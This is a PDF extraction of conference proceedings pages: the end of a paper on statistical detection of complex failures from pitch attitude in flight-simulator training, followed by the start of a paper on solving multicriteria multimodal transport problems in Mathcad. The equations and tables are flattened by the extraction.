Angle, ϑi
i
Angle, ϑi
1
9
11
1
21
−3
31
−1
2
14
12
9
22
−2
32
2
3
2.5
13
4.5
23
0
33
0
4
−5
14
−2
24
2.5
34
3.5
5
2
15
−3.5
25
4
35
0
6
10
16
−2
26
0
36
3.5
7
1
17
−1.5
27
−0.5
37
3
8
2.5
18
−2.5
28
1
38
0
9
−2.5
19
−6
29
0
39
10
10
2.5
20
– 4.5
30
−2.5
40
7.5
Based on the calculations for the generalized Weibull distribution, we obtain the value of the goodness-of-fit test parameter χ2 = 0.627, then P ≈ 0.68. Since this probability is large enough, the hypothesis of the generalized Weibull distribution can be declared as not contradicting the experimental data.
Analysis of Approach Attitude for the Evaluation
71
Fig. 1. Calculation listing of the pitch attitude autospectrum, normalized (norm = 4.453) and unnormalized (unonrm = 68.77) autospectrum
Fig. 2. Listing of constructing a histogram for pitch attitude values (ϑ), its approximation by the Gaussian law and the conformance check of the predicted normal distribution to the statistical one by the criterion of the goodness-of-fit test χ2
It should be noted that these failures make it difficult to control an aircraft. This is due to the control system and the influence of aerodynamic forces. However, when “flying” with these failures only and in case of their combination with other failures, the distribution law is normal. This indicates an increase in the pilot’s psychophysiological tension and the need for training “flights” on the FFS to learn how to counteract an increase in the amplitude of aircraft parameters (IAAP).
72
Y. Hryshchenko et al.
Fig. 3. Listing of constructing a histogram for pitch attitude values (ϑ), its approximation by the Gaussian law and the conformance check of the predicted normal distribution to the statistical one by the criterion of the goodness-of-fit test χ2 in case of flight with complex failures n ≥ 3
Let us synthesize algorithms for detecting the presence of components in the pitch attitude trends that indicate complex failures and possible further severe flight difficulties. Suppose that there are an H 0 hypothesis (no flight difficulties) and an H 1 alternative (there are difficulties). In general, for H 0 , the probability density function of the pitch attitude is a Gaussian random variable, and for H 1 , this probability density function is of the form of the generalized Weibull distribution. To solve the detection problem in this case, the mathematical calculations will be complicated, so we will make the following simplification. Based on the analysis of the form of the pitch attitude parameter in case of flight difficulties, we put forward the assumption that in case of complex failures, there is a model of the bank angle change in the form of an additive combination of two components: Gaussian noise and a harmonic oscillation. Then a sign of complex failures is the presence of a sinusoidal signal in the mixture. To test the possibility of using such a detector, let us simulate the initial signals. We will simulate a normal situation without failures. This situation conforms to a normal noise with expected value m = 1.413, standard deviation σ = 4.407 and sample size N = 50. After that, we will simulate a flight in difficult conditions, in which the human operator’s psychophysiological tension is manifested. In this case, we use discrete sinusoid as information signal Si with amplitude U = 2, period T = 6 and zero initial phase. The implementation of the information signal in the absence and presence of failures is shown in Fig. 4a (no flight difficulties). The implementation of the information signal in the absence and presence of failures is shown in Fig. 4b (no flight difficulties).
Analysis of Approach Attitude for the Evaluation
73
Fig. 4. Simulation graph of a random function of a parameter in flight without failures (a) and with failures (b)
Let us synthesize the signal detection algorithm mathematically using results presented in [19–34]. For the assumptions made, the detection problem is reduced to testing the simple H0 hypothesis that the sample implementation is described by a multivariate Gaussian distribution, versus the simple H1 alternative that the sample implementation contains a useful sinusoidal signal. In this case, the sample counts are considered to be independent random variables. Then 1 − f (x1 , x2 , . . . , xN /H0 ) = √ N e σ 2π 1 − f (x1 , x2 , . . . , xN /H1 ) = √ N e σ 2π
N 2 i=1 (xi −x) 2σ 2
,
N 2 i=1 (xi −x−Si ) 2σ 2
(1)
,
(2)
where σ is the standard deviation, and Si is the known samples of a sinusoidal signal. The parameters x and σ are considered to be known, they can be determined based on the process observation data in the absence of failures. The likelihood ratio determining the decision statistic is found by the formula l(x1 , x2 , . . . , xN ) =
f (x1 , x2 , . . . , xN /H1 ) . f (x1 , x2 , . . . , xN /H0 )
(3)
As a result, we get l(x1 , x2 , . . . , xN ) = e
−
N 2 N 2 i=1 (xi −x−Si ) + i=1 (xi −x) 2σ 2
.
(4)
74
Y. Hryshchenko et al.
To simplify mathematical calculations, we will use the log likelihood ratio, then ln l(x1 , x2 , . . . , xN ) = ln e
−
N 2 N 2 i=1 (xi −x−Si ) + i=1 (xi −x) 2σ 2
N =
i=1 2Si (xi
− x) − Si2
2σ 2
.
(5)
Consequently, we get ln l(x1 , x2 , . . . , xN ) =
1 N 1 N 2 Si (xi − x) − S . 2 i=1 i=1 i σ 2σ 2
(6)
According to the Neyman-Pearson criterion, the choice of the decision threshold V is carried out based on the solution of the following equation for a situation with no sinusoidal oscillations in the analyzed mixture 1 N 1 N 2 Pr 2 (7) Si (xi − x) − S ≥ V /H 0 = α. i=1 i=1 i σ 2σ 2 In this case, the decision threshold is determined by statistical modeling based on the Monte Carlo method. For the given sample size and parameter α = 0.025, as well as the parameters of the detected sinusoidal oscillation, we obtain V ≈ 0. In case of an optimal Bayesian detector, the threshold can be determined according to such a procedure. Let us rewrite the decision statistics in the form of 1 N 1 N 2 S (x − x) = ln l(x , x , . . . , x ) + S . i i 1 2 N i=1 i=1 i σ2 2σ 2
(8)
Then N i=1
Si (xi − x) = σ 2 ln μ c + 0.5
N
S 2, i=1 i
(9)
01 −C00 where μ = qp , c = C C10 −C11 , q and p are the prior probabilities of the hypothesis and the alternative, C00 and C11 are the costs associated with proper decisions, C01 and C10 are the costs involved in erroneous decisions (in this case, C01 > C00 ≥ 0, C10 > C11 ≥ 0). Therefore, the decision threshold for an optimal Bayesian detector is
V = σ 2 lnμc + 0.5
N
S 2, i=1 i
(10)
and the decision rule is: 1) accept H0 , if N i=1 Si (xi − x) < V ; N 2) accept H1 , if i=1 Si (xi − x) ≥ V . Let us consider a method that meets the Neyman-Pearson criterion. If the decision statistic Q exceeds the threshold, then there is a sinusoidal signal in the mixed functions. We will make calculations for the simulation results. In the absence of a sinusoidal signal, we obtain Q(xi /H0 ) =
N −1 i=0
2Si (Ai − m) − (Si )2 = −14.029. 2σ 2
Analysis of Approach Attitude for the Evaluation
75
The obtained value is less than the threshold, which indicates the absence of difficulties during flight and the fact that the decision made is proper. Let us consider statistics with the presence of a sinusoidal signal Q(xi /H1 ) =
N −1 i=0
2Si (Ai − m) − (Si )2 = 5.004, 2σ 2
i.e. the obtained value Q(xi /H1 ) exceeds the decision threshold V ≈ 0, which indicates the presence of difficulties in flight and the fact that the decision made is proper. Therefore, the proposed algorithm works correctly. Multiple simulations have confirmed the efficient detection of a sinusoidal signal for a given interference situation. The results of statistical modeling by the Monte Carlo method for 10,000 repetition procedures show that this detection algorithm is characterized by the following probabilities of erroneous decisions: α = 0.0267 and β = 0.0014. Let us consider a Bayesian optimal detector with the following prior data: – the probability of an emergency situation is p = 0.01, and the probability of a special event in flight is q = 0.99; – cost matrix with components C 00 = 0, C 01 = 10, C 10 = 1,000, C 11 = 0. Let us calculate the decision threshold: N q C01 − C00 + 0.5 V = σ 2 ln S 2 = 50.305. i=1 i p C10 − C11 We will make calculations for the simulation results shown in Fig. 4. In the absence of a sinusoidal signal, we get the following: N Q(xi /H0 ) = Si (Ai − m) = −46.794. i=1
The value Q(xi /H0 ) is less than the threshold, so we declare the absence of a sinusoidal signal and the presence of noise only. We will consider statistics with a sinusoidal signal. In this case: N Si (Ai − m) = 403.206. Q(xi /H1 ) = i=1
The obtained value Q(xi /H1 ) exceeds the decision threshold, which indicates the presence of difficulties in flight and the fact that the decision made is proper. Therefore, the proposed algorithm works correctly. The results of the statistical modeling by the Monte Carlo method for 10,000 repetition procedures show that this detection algorithm is characterized by the following probabilities of erroneous decisions: α = 0.0007 and β = 0.0762. Let us consider the real data of the pitch attitude in “flight” with failures (Table 2). We will construct a graph of the pitch attitude with fixed amplitudes (Fig. 5). Decision statistics for the first method according to the Neyman-Pearson criterion (decision threshold V ≈ 0) is Q(xi ) =
N −1 2Si · (Ai − m) − (Si )2 = 0.232. i=0 2 · σ2
76
Y. Hryshchenko et al.
Fig. 5. Graph of the bank angle versus the “flight” time on the FFS with a complete failure of the UBC (undamped backup control) and a failure of the second (right) engine, where the amplitude of the parameter is U = 3, and the period is T = 4
For the second method according to the Bayesian approach, it is Q(xi ) = V = σ 2 ln
N i=1
q C01 − C00 p C10 − C11
Si (Ai − m) = 45.5. + 0.5
N
S2 i=1 i
= 40.805.
Thus, the two considered algorithms based on the Neyman-Pearson criterion and the optimal Bayesian criterion reveal the presence of a deterministic sinusoidal component in the given FFS “flight”. The quality of pilot training should be compared according to the results obtained during the FFS “flight” with the same set of failures. To assess the quality of pilots’ training for special flights, it is advisable to have a database of statistical data on the output of developed algorithms.
3 Conclusions The pitch attitude, as a random variable, conforms to the normal distribution law for flights without failures or with one failure; in case of flights with complex failures (three or more simultaneous ones), it conforms to the generalized Weibull distribution. The change in the distribution law indicates an increase in the pilot’s psychophysiological tension and the need for training flights on FFSs to learn how to counteract an increase in the amplitude of aircraft parameters. The learning outcomes can be considered positive in flights with complex failures if the pitch attitude as a random variable conforms to the normal distribution law.
Analysis of Approach Attitude for the Evaluation
77
The paper shows for the first time the algorithms for detecting the presence in the pitch attitude trends of the components indicating complex failures and the further possibility of severe difficulties in flight. These algorithms are based on the Neyman-Pearson test and the optimal Bayesian test and have an advantage over known analogues in increasing the probability of making correct decision on stressful situations in flight to 0.9986, which significantly reduces the risk of aviation events. The simulation results show that, when an aircraft is flying with complex failures, the pitch attitude, in addition to the Gaussian noise, contains a sinusoidal component. It is a sign indicating the presence of complex failures. According to its development tendencies, it is possible to indirectly assess the degree of failure complexity (the quantity of failures and types of system being fault). Future research directions are associated with synthesis and analysis of new statistical methods for detection of complex failures during flight including sequential approach that provides advantages in time of decision-making.
References 1. Balcerzac, T., Kostur, K.: Flight simulation in civil aviation: advantages and disadvantages. Revista Europea de Derecho de la Navegación Marítima y Aeronáutica 35, 35–68 (2018) 2. Lee, A.T.: Flight Simulation. Virtual Environments in Aviation. Ashgate Publishing, Farnham (2005) 3. Gabbai, J.: The art of flight simulation. In: Simulation History & Technology, pp. 1–24 (2001) 4. Hryshchenko, Y., Zaliskyi, M., Pavlova, S., Solomentsev, O., Fursenko, T.: Data processing in the pilot training process on the integrated aircraft simulator. Electr. Control Commun. Eng. 17(1), 67–76 (2021). https://doi.org/10.2478/ecce-2021-0008 5. Human factors digest No. 7. Investigation of human factors in accidents and incidents. ICAO Circular 240-AN/144 (1993) 6. Human factors digest No. 8. Human factors in air traffic control. ICAO Circular 241-An/145 (1993) 7. Human factors digest No. 9. Proceedings of the second ICAO flight safety and human factors global symposium. ICAO Circular 243-AN/146 (1993) 8. Human factors digest No. 10. Human factors, management and organization. ICAO Circular 247-An/148 (1993) 9. Human factors digest No. 11. Human factors in CNS/ATM systems. ICAO Circular 249AN/149 (1994) 10. Human factors digest No. 12. Human factors in aircraft maintenance and inspection. ICAO Circular 253-AN/151 (1995) 11. Rozenberg, R., et al.: Human factors and analysis of aviation education content of military pilots. In: New Trends in Aviation Development, Chlumec nad Cidlinou, pp. 139–144. Czech Republic (2019). https://doi.org/10.1109/NTAD.2019.8875561 12. Kal’avský, P., et al.: Human factors and analysis of methods, forms and didactic means of aviation education of military pilots. In: New Trends in Aviation Development, Chlumec nad Cidlinou, pp. 77–81. Czech Republic (2019). https://doi.org/10.1109/NTAD.2019.8875601 13. Vargová, M., Balážiková, M., Hovanec, M., Švab, P., Wysocza´nská, B.: Estimation of human factor reliability in air operation. In: New Trends in Aviation Development, Chlumec nad Cidlinou, pp. 209–213. Czech Republic (2019). https://doi.org/10.1109/NTAD.2019.8875591 14. McFadden, K.L., Towell, E.R.: Aviation human factors: a framework for the new millennium. J. Air Transp. Manag. 5, 177–184 (1998)
78
Y. Hryshchenko et al.
15. Huang, D., Fu, S.: Human factors modeling schemes for pilot-aircraft system: a complex system approach. In: Harris, D. (ed.) EPCE 2013. LNCS (LNAI), vol. 8020, pp. 144–149. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-39354-9_16 16. Shorrock, S.T., MacKendrick, H., Hook, M., Cumming, C., Lamoureux, T.: The development and application of human factors guidelines with automation support. In: People in Control. Human Interfaces in Control Rooms, Cockpits and Command Centers, Manchester, UK, pp. 67–71 (2001). https://doi.org/10.1049/cp:20010434 17. Hryshchenko, Yu., Romanenko, V., Pipa, D.: Methods for assessing of the glissade entrance quality by the crew. In: Handbook of Research on Artificial Intelligence Applications in the Aviation and Aerospace Industries, pp. 372–403. IGI Global, USA (2019). https://doi.org/10. 4018/978-1-7998-1415-3.ch016 18. Hryshchenko, Yu., Romanenko, V., Zaliskyi, M.: Quality assessment of aircraft glide path entrance. In: CEUR Workshop Proceedings, vol. 2711, pp. 649–660 (2020) 19. Mukhopadhyay, N.: Probability and Statistical Inference. CRC Press (2020) 20. Bolstad, W.M.: Introduction to Bayesian Statistics. Wiley, New York (2007) 21. Prokopenko, I.G., Migel, S.V., Prokopenko, K.I.: Signal modeling for the efficient target detection tasks, In: International Radar Symposium, Dresden, Germany, pp. 976–982 (2013) 22. Prokopenko, I., Omelchuk, I., Maloyed, M.: Synthesis of signal detection algorithms under conditions of aprioristic uncertainty. In: IEEE Ukrainian Microwave Week, Kharkiv, Ukraine, pp. 418–423 (2020). https://doi.org/10.1109/UkrMW49653.2020.9252687 23. Hryshchenko, Y.: Reliability problem of ergatic control systems in aviation. In: International Conference on Methods and Systems of Navigation and Motion Control, Kyiv, Ukraine, pp. 126–129 (2016). https://doi.org/10.1109/MSNMC.2016.7783123 24. Volosyuk, V., et al.: Optimal method for polarization selection of stationary objects against the background of the Earth’s surface. Int. J. Electron. Telecommun. 68(1), 83–89 (2022). https://doi.org/10.24425/ijet.2022.139852 25. Shmatko, O., et al.: Synthesis of the optimal algorithm and structure of contactless optical device for estimating the parameters of statistically uneven surfaces. Radioelectron. Comput. Syst. 4, 199–213 (2021). https://doi.org/10.32620/reks.2021.4.16 26. Ostroumov, I., Kuzmenko, N.: Configuration analysis of European navigational aids network. In: 2021 Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1– 9 (2021). https://doi.org/10.1109/ICNS52807.2021.9441576 27. Zaliskyi, M., Solomentsev, O.: Method of sequential estimation of statistical distribution parameters in control systems design. In: IEEE 3rd International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kyiv, Ukraine, pp. 135–138 (2014). https://doi.org/10.1109/MSNMC.2014.6979752 28. Solomentsev, O., et al.: Substantiation of probability characteristics for efficiency analysis in the process of radio equipment diagnostics. In: 2021 IEEE 3rd Ukraine Conference on Electrical and Computer Engineering (UKRCON), Lviv, Ukraine, pp. 535–540 (2021). https:// doi.org/10.1109/UKRCON53503.2021.9575603 29. Ostroumov, I.V., Kuzmenko, N.S.: Accuracy estimation of alternative positioning in navigation. In: 2016 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 291–294 (2016). https://doi.org/10.1109/MSNMC.2016.778 3164 30. Zaliskyi, M., et al.: Heteroskedasticity analysis during operational data processing of radio electronic systems. In: Shukla, S., Unal, A., Varghese Kureethara, J., Mishra, D.K., Han, D.S. (eds.) Data Science and Security. LNNS, vol. 290, pp. 168–175. Springer, Singapore (2021). https://doi.org/10.1007/978-981-16-4486-3_18 31. Sushchenko, O.A., Golitsyn, V.O.: Data processing system for altitude navigation sensor. In: Methods and Systems of Navigation and Motion Control, Kyiv, Ukraine, pp. 84–87 (2016). https://doi.org/10.1109/MSNMC.2016.7783112
Analysis of Approach Attitude for the Evaluation
79
32. Kharchenko, V.P., Kuzmenko, N.S., Ostroumov, I.V.: Identification of unmanned aerial vehicle flight situation. In: IEEE 4th International Conference on Actual Problems of Unmanned Aerial Vehicles Developments (APUAVD), Kyiv, Ukraine, pp. 116–120 (2017). https://doi. org/10.1109/APUAVD.2017.8308789 33. Bickel, P.J., Doksum, K.A.: Mathematical Statistics: Basic Ideas and Selected Topics. Wiley, New York (2001) 34. Ostroumov, I., Marais, K., Kuzmenko, N.: Aircraft positioning using multiple distance measurements and spline prediction. Aviation 26(1), 1–10 (2022). https://doi.org/10.3846/avi ation.2022.16589
Information Technology in Engineering and Robotics
Solving Multimodal Transport Problems Using Algebraic Approach Sergii Mogilei(B) , Artem Honcharov, and Yurii Tryus Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The paper considers a multicriteria multimodal transport problem, which contains three types of transport and two objective functions. The article investigates the possibility of transforming a multi-criteria multimodal transport problem into a classical transport problem by constructing a system of linear matrix equations and inequalities. It is shown that measurements for the corresponding system of linear matrix equations and inequalities are directly dependent on the number of objective functions of the considered problem. The paper proposes the algorithm for finding the problem reference plans, which is based on finding the reference plans for different types of vehicles. The multicriteria problem is solved using the method of weighted coefficients and the method of sequential concessions according to the relevant criteria. Tools of the computer mathematics system Mathcad were used for the numerical experiment on solving demonstration problems by the methods proposed in the work and for comparing the obtained results. The application of the proposed methods in this paper for solving multicriteria multimodal transport problems allows to reduce the number of iterations in the numerical solution of these problems and to overcome the different measurement problem of the objective functions in their superposition. Keywords: Multicriteria optimization · multimodal transport problem · system of linear matrix equations and inequalities · integrated reference plan method · Mathcad
1 Introduction Logistic problems emerging before the investigators of the transportation processes [1] reveal a serious level of complexity. It is explained through both prominent modality of such problems, and a big number of logistic optimization criteria. Besides, considering the fact that the classic transport problem is to determine the optimal transportation plan [2], the measurements of the problem mainly influence the volume of the data processed [3], in other words, the number of delivery and departure points really matters. Except the measurement of the problem itself, it is important to regard the content and properties of its objective functions, as, in case of their excessive complexity, there may be increase in applying hardware and software for the calculations. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 83–101, 2023. https://doi.org/10.1007/978-3-031-35467-0_6
84
S. Mogilei et al.
The problem of solving modern transport tasks of high dimensionality is currently of great interest. We will consider a multimodal problem [4] such a problem, that involves the simultaneous use of several means of transport. The first stage of the study considers multimodal transport problems with one optimization criterion. The purpose of the stage is to study how the proposed algorithms work when there is only one objective function. The next stage of the study is the analysis and solution of a multicriteria model of a multimodal transport problem. This transition from single-criteria to multi-criteria will allow to determine the significant differences between the algorithms for implementing different classes of multimodal transport problems. In recent time, multicriteria multimodal transport problems have become a focus of attention and various models of them are regarded through various optimization criteria, for instance, time delay optimization as well as money expenditures and fuel charges [5]. Indeed, time and money factors are quite important considering probable additional constraints, for example, the number of containers for cargo transportation [6], etc. Speaking on the model of the problem, assume that its appropriate formula is that to promote the one with three transport means and two optimization criteria [7]. Examples of different modes of transport are road, rail, water (internal - river or external - sea), air, etc. Objective functions, in addition to the mentioned above, can be the functions of minimizing the cost of transportation (classical criterion) or minimizing risk [8], etc. The formulation of transport problem model is quite sufficient to demonstrate the efficiency of the vast majority of algorithms for its solution. While considering the search for this problem solution, it’s worth speaking of investigating it through Pareto-optimal set [9]. That is, as a result of solving the multimodal transport problem, Pareto-optimal solutions should be obtained. Besides, the more constrained Pareto-optimal set is, the sooner and with smaller iterations number, the optimal solution for the problem will be found. Otherwise, if Pareto set of the related problem is too complex or too broad, the process of search for the optimal solution can be considerably delayed. One of today’s main issues of numerical solution of multicriteria transport problems is the determination of the initial reference plan. This issue’s solution will enable to reduce considerably iterations number in solving the problem. It especially relevant to the problems of high dimensionality. Therefore, it is so important to work out new and more efficient methods to solve this problem. The purpose of the investigation is to study the possibilities of transforming the multicriteria multimodal transport problems into similar one-criteria with one mean of cargo delivery, that is, classical transport problems, as well as the construction of new methods for solving this class of problems. The proper solution for the problems of the type is generally impossible without special software. Therefore, the paper provides examples of the Mathcad environment application to implement the methods proposed in the study. The main part of the article contains the following issues: problem statement, method of problem solution, scheme for the algorithm and solving the problem using Mathcad. Problem Statement. Construct a model of a classical multimodal transport problem for three means of transport. This model will contain one objective function of minimization
Solving Multimodal Transport Problems Using Algebraic Approach
85
S and three cost matrices for transportation C k = (cijk ): S(X k ) = C k × X k → min, 3 m k x = ai , i = 1, n, 3k=1 nj=1 kij x k=1 i=1 ij = bj , j = 1, m, k xij ≥ 0, k = 1, 3, i = 1, n, j = 1, m,
(1)
where n, m are numbers of departure points and delivery points correspondingly; X k = (xijk ) are questioned matrices of reference plans for each means of transport, xijk are amounts of cargo transported from i-departure point to j-delivery point by k-means of transport; cijk ≥ 0 are costs (for one unit) of cargo transported from i-departure point to j-delivery point by k-means of transport; ai > 0 is the quantity of reserves in i-departure point and bj > 0 is the quantity of needs in j-delivery point. At the same time, we will assume that the condition is met: n m ai = bj . i=1
j=1
Relation C k × X k is given as: Ck × X k =
3 k=1
n,m
ck i,j=1 ij
· xijk ,
(2)
that is, objective function S for the problem is the sum of multiplications of corresponding elements of the cost matrices and reference plans for all means of transport. Expand problem statement (1) and construct the model for a multimodal transport problem that contains two objective functions of minimization – cost S and risk R: S(X k ) = C k × X k → min, R(X k ) = Rk × X k → min, 3 m k x = ai , i = 1, n, 3k=1 nj=1 kij k=1 i=1 xij = bj , j = 1, m, k xij ≥ 0, k = 1, 3, i = 1, n, j = 1, m,
(3)
where Rk = (rijk ) and 0 ≤ rijk ≤ 1 is the risk of transportation the cargo from i-departure point to j-delivery point by k-means of transport (risk matrices Rk are known). Mark with Smin , Rmin the minimal values of objective functions S, R correspondingly, and with X¯ S , X¯ R – the corresponding optimal plans. Start to solve problems (1) and (3).
86
S. Mogilei et al.
2 Methods 2.1 Method of Problem Solution The problem (1) solution applies the algorithm, based on integrated reference plan method [10]: 1. Construct matrix St that is the matrix of minimal (according to the minimization criterion) elements of matrices Cijk , that is: St = (Stij ) = min(Cijk ), Stij = min(cijk ), k
k
i = 1, n, j = 1, m, k = 1, 3.
(4)
2. Construct problem (5), which is equivalent to problem (1), and minimize objective function S1: S1(X ) = St × X = n,m i,j=1 Stij · xij → min, m x = ai , i = 1, n, (5) nj=1 ij x i=1 ij = bj , j = 1, m, xij ≥ 0, i = 1, n, j = 1, m, where X = (xij ) is the matrix of integrated reference plan, and X = X 1 +X 2 +X 3 is the sum of reference plans for all modes of transport. 3. As the result of minimization (5), we have the minimal value S1min = S1 X¯ of objective function S1 and integrated reference plan X¯ = (¯xij ) of the problem, that is optimal according to Pareto. Notice that S1min = Smin . Meanwhile the statement is proved for: 3 k X , (6) X¯ = k=1 k where X = xkij , X¯ = x¯ ij , x¯ ij = 3k=1 xkij , i = 1, n, j = 1, m. As the problem regards matrices of reference plans X¯ k for each type of transport, so note the system of linear matrix equations that comes from (5) and (6): X 1 + X 2 + X 3 = X¯ , (7) 1 1 C × X + C 2 × X 2 + C 3 × X 3 = Smin Note that in case of presenting only two means of transport (k = 2), system (7) will become: X 1 + X 2 = X¯ , (8) 1 C × X 1 + C 2 × X 2 = Smin System (8) is generally a system of two linear matrix equations of two matrices. It allows to hypothesize the existence of a single solution of such a system, because it can be solved in presumably visible state – transition to the following systems: X 1 = X¯ − X 2 , (9) 1 C × (X¯ − X 2 ) + C 2 × X 2 = Smin
Solving Multimodal Transport Problems Using Algebraic Approach
or
87
X 1 = X¯ − X 2 , C 1 × (X¯ − X 2 ) + C 2 × X 2 = Smin
Through simple algebraic transformations, systems (9) will become a group of systems: ⎡ 1 X = X¯ − X 2 , ⎢ (C 2 − C 1 ) × X 2 = Smin − C 1 × X¯ ⎢ (10) ⎣ X 2 = X¯ − X 1 , (C 1 − C 2 ) × X 1 = Smin − C 2 × X¯ The problem in statement (3) is solved as in (1) but consistently for each optimization criterion. Obviously, in this case the system of equations and inequalities is obtained: ⎧ X 1 + X 2 + X 3 = X¯ , ⎨ 1 1 (11) C × X + C 2 × X 2 + C 3 × X 3 ≥ Smin ⎩ 1 R × X 1 + R2 × X 2 + R3 × X 3 ≥ Rmin Note that when solving systems (7)–(11) by default, the following conditions are fulfilled xijk ≥ 0, k = 1, 3, i = 1, n, j = 1, m. If integrated reference plan method is applied to problem (3), it is possible to obtain minimal values Smin , Rmin for objective functions S, R correspondingly. However, there will be two integrated reference plans for each optimization criterion – X¯ S , X¯ R , for cost and for risk correspondingly. To obtain a compromising reference plan X¯ in relation to X¯ S , X¯ R the problem (3) is to be solved as a multicriteria optimization problem. Therefore, two means of solution are regarded: weighted coefficients method [11, 12] and successive concessions method [13, 14]. According to weighted coefficients method, it is necessary to make superposition F for objective functions S and R, then minimize it and obtain a matrix for reference plan X¯ : F(X k ) = k1 · S(X k ) + k2 · R(X k ) → min, 3 m k x = ai , i = 1, n, 3k=1 nj=1 kij x k=1 i=1 ij = bj , j = 1, m, k xij ≥ 0, k = 1, 3, i = 1, n, j = 1, m,
(12)
where k1 , k2 ∈ R; k1 , k2 ≥ 0; k1 + k1 = 1. The method has two disadvantages: 1. Function F is indefinitely measured (cost S is measured in monetary units, and risk R – in conditional units). 2. Since the function F is minimized similarly to (5), there is an additional problem of constructing the matrix of minimal elements St. This is possible, however, complicates the overall process of algorithmization of the main task. Both of these disadvantages can be avoided if the method of successive concessions is applied to solve the problem (3), as it was introduced in [15]. The method consists in
88
S. Mogilei et al.
the fact that between the reference plans X¯ S , X¯ R there is some reference plan X¯ that is sufficient, in opinion of decision maker, for both objective functions of problem (3). To obtain this plan it is possible to apply the mechanism of successive concessions related to the main criterion of optimization (for example, S), gradually transforming its value to benefit the additional criterion (that is R). This plan can be obtained through the mechanism of successive concessions to the main optimization criterion (for example, S), gradually changing its value in favor of the secondary criterion (for example, R). This algorithm forces to turn to the weighted coefficients method, though in some other interpretation as in (12). Partially, this approach is shown in [10], where not superposition F of objective functions S and R is regarded, but the compromising reference plan X as a superposition of reference plans X¯ S , X¯ R for each optimization criterion: X¯ = k1 · X¯ S + k2 · X¯ R ,
(13)
where k1 , k2 ∈ R; k1 , k2 ≥ 0; k1 + k1 = 1 and relation k · X , X = (xij ) for the case i, j = 1, 2 is written as: k · x11 k · x12 x x . (14) k · X = k · (xij ) = k · 11 12 = x21 x22 k · x21 k · x22 The main conclusion for these methods application is that the reference plan X for the problem (3) really exists and the algorithm for its defining is known and therefore the system (11) can be solved. Besides, this solution is not the only one, because the system (11) includes 1 matrix equation and 2 matrix inequalities. 2.2 Scheme for the Algorithm and Solving the Problem Using Mathcad Hence, it is possible to make a general scheme of algorithm of transformation of a multicriteria multimodal transport problem into similar one-criterial problem with one mean of transportation (Fig. 1). Obviously, the number of criteria for problems (1) and (3) determines the number of linear matrix equations and inequalities in systems like (7), (8) and (11). In other words, if the multimodal transport problem is a σ-criteria one, the measurement for the related system of equations and inequalities will be equal to σ + 1.
Solving Multimodal Transport Problems Using Algebraic Approach
89
Fig. 1. Block-scheme for the algorithm of solution of multicriteria multimodal transport problem of the form (3)
3 Results First, the problem (1) must be solved with one optimization criterion and three means of transportation. The solution is based on the initial data of the problem and the results obtained in [10], as well as on the algorithm from Fig. 1. Presumably, to solve problems (1) and (3) with Mathcad, it is important to apply the initial data in block Given and solution search functions Find, Minerr and Minimize [16]. Minimize function is responsible for calculating minimal value of the objective function; Find and Minerr functions are applied for solving equations, inequalities and their systems. The difference between them is that function Find returns the exact value of equation roots (their systems), whereas Minerr function does the same with the result of the latest numeric iteration of the algorithm for solution search (and in case of its coincidence the result of the process will be the same as the result of Find function). According to these properties the proper function for the problem solution will be chosen while using Mathcad.
90
S. Mogilei et al.
Let’s consider examples of the application of the described methods of solving transport problems (1) and (3) with Mathcad. 1. Finally, 3 cost matrices for each means of transportation, as in problem statement (1), are given: ⎛
⎞ 521.25 397.5 112.5 C 1 = ⎝ 597.5 473.75 190.05 ⎠, 693.75 591.25 178.75 ⎛ ⎞ 435.6 230.0 76.32 C 2 = ⎝ 485.28 279.36 149.76 ⎠, 469.44 339.84 110.88 ⎛ ⎞ 372.02 250.0 38.0 C 3 = ⎝ 331.36 223.06 76.0 ⎠ 404.32 296.4 88.16 The amounts of supplies in departure points and needs in delivery points are correspondingly equal to A = (480; 420; 300), and B = (320; 500; 380). In Mathcad (Fig. 2):
Fig. 2. Input data of the problem: matrices of the cost of transportation, stocks at the points of departure and needs of the points of delivery.
2. Calculate matrix of minimal costs of type (4) (Fig. 3):
Fig. 3. Calculating matrix of minimal costs
Solving Multimodal Transport Problems Using Algebraic Approach
91
Fig. 4. Calculating X and S(X)
3. Introduce the objective function S(X), the constraints of the problem, solve the problem (5) and find the matrix X¯ of the optimal compromise reference plan and calculate the optimal value of the objective function S(X) (Fig. 4). The obtained results completely coincide with the results obtained earlier in [10]. 4. Point 4 of the algorithm from Fig. 1 for problem (1) is omitted as it is not a multicriteria one. 5. Further solve system of Eqs. (7) (Fig. 5): k 6. Matrices of reference plans X for each type of transport are found, which form an optimal compromise plan X¯ (6) (Fig. 6).
92
S. Mogilei et al.
Fig. 5. Solution of the system of equations
k
Fig. 6. Results of calculations of the reference plans matrix X , k = 1, 3 (in Fig. they are marked accordingly V0 , V1 , V2 )
It means cargo transportations will not apply first mean of transportation; second one will be applied for transporting 400 cargo units from departure point 1 to delivery point 2; the rest of cargo will be delivered by third mean of transportation. Give verification of the obtained results – provide solution by Mathcad for problem (1) with the same initial data, but using another, already known optimization method [17] (Figs. 7, 8 and 9):
Fig. 7. Initial data of the problem
Solving Multimodal Transport Problems Using Algebraic Approach
93
Fig. 8. Problem solution
Fig. 9. Result of calculations
Obviously, solution results for the problem (1) obtained by various means coincide. Further give solution of the multicriteria problem (3). For that, start with solving one-criterial problem, similar to problem (1), for the risk objective function R (initial data are taken from [10]): Transportation risks matrices are shown in (Fig. 10):
Fig. 10. Transportation risks matrices
Calculating matrix of minimal risks (Fig. 11): The risk objective function is minimized in the traditional way (Fig. 12).
94
S. Mogilei et al.
Fig. 11. Calculating matrix of minimal risks
Fig. 12. Minimizing the risk objective function
The result of solving the problem for risk minimization, similar to the problem of cost minimization from (Fig. 5), is shown in (Fig. 13). The sum of the obtained matrices V0 , V1 , V2 gives a transportation plan that coincides with the result in (Fig. 12), but different from the one obtained in [10].
Solving Multimodal Transport Problems Using Algebraic Approach
95
Fig. 13. Result of calculations
